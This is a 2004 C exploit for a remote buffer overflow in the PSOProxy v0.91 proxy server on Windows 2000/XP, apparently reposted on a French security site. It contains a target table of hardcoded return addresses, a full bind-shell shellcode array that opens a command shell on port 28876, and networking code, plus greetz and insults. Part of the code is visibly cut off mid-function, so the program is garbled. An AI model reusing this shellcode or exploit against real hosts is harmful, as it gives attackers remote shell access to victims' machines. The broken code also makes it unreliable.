PSOProxy v0.91 Remote buffer Overflow Exploit (Windows 2000/XP)

    
 
/*

                              Copyright © Rosiello Security

                              http www rosiello org
                              ================

                              -== Remote Exploit for PSOProxy version v0.91 ==--
                              Code by: rave
                              Contact: 
                              Date: Feb 2004
                              Bug found by: Donato Ferrante

                              There is a vulnerability found in the PSOProxy server.
                              An attacker can execute arbitrary code exploiting remotely a buffer overflow.

                              The exploit sends:

                              GET / 

                              This spawns a bindshell on the victim at port 28876..


                              Usage psoproxy-exploit.exe  
                              Target Number           Target Name                             Stack Adress
                              =============           ===========                             ===========
                              0                       Demo                                    0xBADC0DED
                              1                       Windows XP Home Edtion SP1.             0x00D2FDDA
                              2                       Windows XP Pro Edtion SP1.              0x00EDFDDC
                              3                       Win2k Pro Edtion.                       0x00BBFDDC



                               psoproxy-exploit localhost 1
                              [+] Winsock Inalized
                              [+] Trying to connect to localhost:8080
                              [+] socket inalized
                              [+] Overflowing string is Prepared
                              [+] Connected.
                              [+] Overflowing string had been send


                               telnet localhost 28876
                              Microsoft Windows XP [versie 5.1.2600]
                              (C) Copyright 1985-2001 Microsoft Corp.

                              

                              DO NOT USE THIS CODE ON DIFFERENT MACHINES BUT YOURS!!!
                              Respect the law as we do!




                              Special Tankz to:
                              opy   { win2k 0wnage !! ty for lending me ur box }
                              B0f   { Hope to work with u again in the futhure like we do all the time }
                              Dragnet  { Always willing to help me out }
                              Angelo  { Verry good maffio`so }


                              Greetz go out to:
                              Kajun  { Verry suportive guy }
                              NrAziz { 0wns pakistan hax0r scene ! beware always say mr NrAziz }
                              sloth  { good guy }
                              Mercy  { Hope to see u soon }
                              Netric security {www.netric.org/.de }
                              [+] All the hax0rs i forgot.

                              Hate Messages:
                              Ziphie { U didnt get mine bitch }

                              OOh and Li0n7 voila fr {
                              you're doing it all wrong, your exploit doesn't work!
                              http://www.securityfocus.com/archive/1/354769/2004-02-15/2004-02-21/0
                              k/j man, keep on doing the good stuff and next time add some more stack adresses so
                              it would work on other os`s...

                              }



                              Advisory at: http://www.rosiello.org/en/read_bugs.php?15

                              */


                              #include 
                              #include 
                              #include 
                              #include 

                              // Darn fucking 1337 macro shit
                              #define ISIP(m) (!(inet_addr(m) ==-1))

                              #define offset 1024 //1024





                              struct remote_targets {
                              char *os;
                              unsigned long sh_addr;
                              } target [] ={
                              /* Option`s for your eyes only :D*/
                              "Demo                        ",
                              0xbadc0ded,


                              "Windows XP Home Edtion SP1. ",
                              0x00D2FDDA,

                              "Windows XP Pro Edtion SP1.  ",
                              0x00edfddc,


                              "Win2k Pro Edtion.          ",
                              0x00bbfddc,

                              };






                              //Bindcode spawns a binshell on port 28876 (Thanks to metasploit.com guys)
                              unsigned char  shellcode[] =
                              "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
                              "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
                              "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
                              "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
                              "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
                              "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
                              "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
                              "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
                              "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
                              "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
                              "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
                              "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
                              "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
                              "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x60"
                              "\x6a\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x23\xff\xff\xff\x89"
                              "\xc6\x31\xdb\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x31\xdb\x56\x56"
                              "\x56\x53\x53\x31\xc0\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53"
                              "\x53\x53\x53\x6a\x44\x89\xe0\x53\x53\x53\x53\x54\x50\x53\x53\x53"
                              "\x43\x53\x4b\x53\x53\x51\x53\x87\xfd\xbb\x21\xd0\x05\xd0\xe8\xdf"
                              "\xfe\xff\xff\x5b\x31\xc0\x48\x50\x53\xbb\x43\xcb\x8d\x5f\xe8\xcf"
                              "\xfe\xff\xff\x56\x87\xef\xbb\x12\x6b\x6d\xd0\xe8\xc2\xfe\xff\xff"
                              "\x83\xc4\x5c\x61\xeb\x89\x41";


                              // now what would this button do ?
                              char *host_ip;
                              u_long get_ip(char *hostname)
                              {
                              struct  hostent    *hp;

                              if (ISIP(hostname)) return inet_addr(hostname);

                              if ((hp = gethostbyname(hostname))==NULL)
                              { perror ("[+] gethostbyname() failed check the existance of the host.\n");
                              exit(-1); }

                              return (inet_ntoa(*((struct in_addr *)hp->h_addr)));
                              }


                              /// oooh yeah uuuh right ....
                              int usage (char *what)
                              {
                              int i;
                              fprintf(stdout,"Copyright © Rosiello Security\n");
                              fprintf(stdout,"http://www.rosiello.org\n\n");
                              fprintf(stdout,"Usage %s  \n",what);
                              fprintf(stdout,"Target Number\t\tTarget Name\t\t\t\tStack Adress\n");
                              fprintf(stdout,"=============\t\t===========\t\t\t\t===========\n");

                              for (i=0;i   28876

                               telnet localhost 28876
                              Microsoft Windows XP [versie 5.1.2600]
                              (C) Copyright 1985-2001 Microsoft Corp.

                              D:\>
                              */


                              // the cleaners !!
                              WSACleanup();

                              // [EOF]
                              return 0;

                              }
                              

 F-VNS Security™  Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits